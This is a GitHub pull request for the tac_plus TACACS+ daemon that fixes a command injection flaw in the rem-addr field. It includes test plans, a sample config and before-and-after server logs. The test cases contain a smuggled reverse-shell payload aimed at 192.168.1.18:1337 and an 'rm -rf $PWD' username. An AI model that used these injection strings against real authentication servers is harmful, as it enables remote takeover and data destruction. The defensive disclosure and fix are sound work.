facebook / tac_plus

A Tacacs+ Daemon tested on Linux (CentOS) to run AAA via TACACS+ Protocol via IPv4 and IPv6.
MIT License

[tacplus] add input validation for remote-addr field #39

Closed RollerMatic closed 1 year ago

RollerMatic commented 1 year ago

This diff fixes an RCE vulnerability within the tacplus code. The rem-addr field, injectable through a TACACS+ client, can be used to run a bash script on the host under certain conditions: a) the user config should have a before authorization directive, and a service should be specified. This fix treats the rem-addr field as an alphanumeric string; its values are generally IP addresses, hostnames, or vendor-specific strings such as Local/Infinode. This fix will return the value "unknown" if the rem-addr field consists of non-alphanumeric characters. The treatment of this string is left to the remote system being called by tac_plus (to accept/reject).

Test plan

```
./configure --without-libwrap
make
LD_LIBRARY_PATH=.libs. libs/tac_plus ./tac_plus -G -d 5 -l /dev/stdout -p 4949 -C tac_plus.cfg
```

Outputs - Before

```
Mon May 22 17:26:00 2023 [1780828]: Before authorization call: /usr/local/sbin/tac_policy -- '$user' '$address'
Mon May 22 17:26:00 2023 [1780828]: substitute: /usr/local/sbin/tac_policy -- '$user' '$address'
Mon May 22 17:26:00 2023 [1780828]: Dollar substitution: /usr/local/sbin/tac_policy -- 'DEFAULT' 'asd';bash -i >& echo 'hello''
Mon May 22 17:26:00 2023 [1780828]: input service=exec
```

After

```
Mon May 22 17:28:14 2023 [1802525]: Before authorization call: /usr/local/sbin/tac_policy -- '$user' '$address'
Mon May 22 17:28:14 2023 [1802525]: substitute: /usr/local/sbin/tac_policy -- '$user' '$address'
Mon May 22 17:28:14 2023 [1802525]: invalid character='
Mon May 22 17:28:14 2023 [1802525]: Dollar substitution: /usr/local/sbin/tac_policy -- 'DEFAULT' 'unknown'
Mon May 22 17:28:14 2023 [1802525]: input service=exec
Mon May 22 17:28:14 2023 [1802525]: Error Error from program (66): "sh: line 1: /usr/local/sbin/tac_policy: No such file or directory "
Mon May 22 17:28:14 2023 [1802525]: pid 1802527 child exited status 127
Mon May 22 17:28:14 2023 [1802525]: cmd /usr/local/sbin/tac_policy -- '$user' '$address' returns 127 (unrecognised value)
Mon May 22 17:28:14 2023 [1802525]: authorization query for 'DEFAULT' tty0 from ::1 rejected
```
RollerMatic commented 1 year ago

Added some additional validations for other fields.

test plan

```
./configure --without-libwrap
make
./tac_plus -G -d 20 -l /dev/stdout -p 2046 -C tac_plus.cfg
```

sample config file

```
❯ cat tac_plus.cfg
key = fooman

accounting file = /tmp/acct.log

user = DEFAULT {
    before authorization "/home/sahuja4/tac_plus/sample.sh -- '$user' '$address'"
    service = exec {
        default attribute = permit
    }
}
```

The sample.sh file dumps all input args into a tmp file

```
❯ cat ../sample.sh
#!/bin/bash
# Append every argument tac_plus passed us to /tmp/vars.txt
echo $@ >> /tmp/vars.txt
```

What we want to check is that any arg inside the author_data struct that we cannot validate is set to "unknown" and is passed on to the binary specified in pre/post authorization.

We have 3 cases which we want to test.

Case 1: Invalid username

```
./debug -- --mode authz --username "rm -rf $PWD" --cmd "show run"
```

Case 2: Invalid rem-addr

```
./debug -- --mode authz --username "rm -rf $PWD" --cmd "show run" --rem-addr "asd';bash -i >& /dev/tcp/192.168.1.18/1337 0>&1 #"
```

Case 3: Correctly formatted username and rem-addr

```
./debug -- --mode authz --username sahuja4 --cmd "show run"
```

The following output was produced when the tacacs client was invoked for the 3 cases:

```
❯ cat /tmp/vars.txt
-- unknown devvm2737   <- case 1
-- sahuja4 unknown     <- case 2
-- sahuja4 devvm2737   <- case 3
```

Here is the server output when run against the client:

```
Tue Oct  3 15:33:28 2023 [2213901]: Reading config
Tue Oct  3 15:33:28 2023 [2213901]: Version F4.0.4.28-7fb Initialized 1
Tue Oct  3 15:33:28 2023 [2213901]: tac_plus server F4.0.4.28-7fb starting
Tue Oct  3 15:33:28 2023 [2213901]: socket FD 4 AF 10
Tue Oct  3 15:33:28 2023 [2213901]: Error Cannot write pid to /var/run/tac_plus.pid.2046 Permission denied
Tue Oct  3 15:33:28 2023 [2213901]: uid=189399 euid=189399 gid=100 egid=100 s=8000912
Tue Oct  3 15:33:32 2023 [2213901]: connection [1] from ::1 [::1]
Tue Oct  3 15:33:32 2023 [2213901]: forked 2214436
Tue Oct  3 15:33:32 2023 [2213901]: forked 2214436 for ::1, procs 1, procs for client 1
============================== case 1============================================
Tue Oct  3 15:33:32 2023 [2214436]: Authenticating ACLs for user 'DEFAULT' instead of 'rm -rf /home/sahuja4/fbsource/fbcode'
Tue Oct  3 15:33:32 2023 [2214436]: invalid character=[ ]
Tue Oct  3 15:33:32 2023 [2214436]: authorization query for 'rm -rf /home/sahuja4/fbsource/fbcode' tty0 from ::1 accepted
Tue Oct  3 15:33:32 2023 [2214436]: exit status=0
Tue Oct  3 15:33:32 2023 [2213901]: Clening up session for pid 2214436
Tue Oct  3 15:33:32 2023 [2213901]: Pid 2214436 Lowered Count for ::1 to 0
Tue Oct  3 15:34:52 2023 [2213901]: connection [1] from ::1 [::1]
Tue Oct  3 15:34:52 2023 [2213901]: forked 2234734
Tue Oct  3 15:34:52 2023 [2213901]: forked 2234734 for ::1, procs 1, procs for client 1
Tue Oct  3 15:34:52 2023 [2234734]: Authenticating ACLs for user 'DEFAULT' instead of 'sahuja4'
============================== case 2============================================
Tue Oct  3 15:34:52 2023 [2234734]: invalid character=[']
Tue Oct  3 15:34:52 2023 [2234734]: authorization query for 'sahuja4' tty0 from ::1 accepted <- case 2
Tue Oct  3 15:34:52 2023 [2234734]: exit status=0
Tue Oct  3 15:34:52 2023 [2213901]: Clening up session for pid 2234734
Tue Oct  3 15:34:52 2023 [2213901]: Pid 2234734 Lowered Count for ::1 to 0
Tue Oct  3 15:36:13 2023 [2213901]: connection [1] from ::1 [::1]
Tue Oct  3 15:36:13 2023 [2213901]: forked 2249661
Tue Oct  3 15:36:13 2023 [2213901]: forked 2249661 for ::1, procs 1, procs for client 1
============================== case 3============================================
Tue Oct  3 15:36:13 2023 [2249661]: Authenticating ACLs for user 'DEFAULT' instead of 'sahuja4'
Tue Oct  3 15:36:13 2023 [2249661]: authorization query for 'sahuja4' tty0 from ::1 accepted
Tue Oct  3 15:36:13 2023 [2249661]: exit status=0
Tue Oct  3 15:36:13 2023 [2213901]: Clening up session for pid 2249661
Tue Oct  3 15:36:13 2023 [2213901]: Pid 2249661 Lowered Count for ::1 to 0
```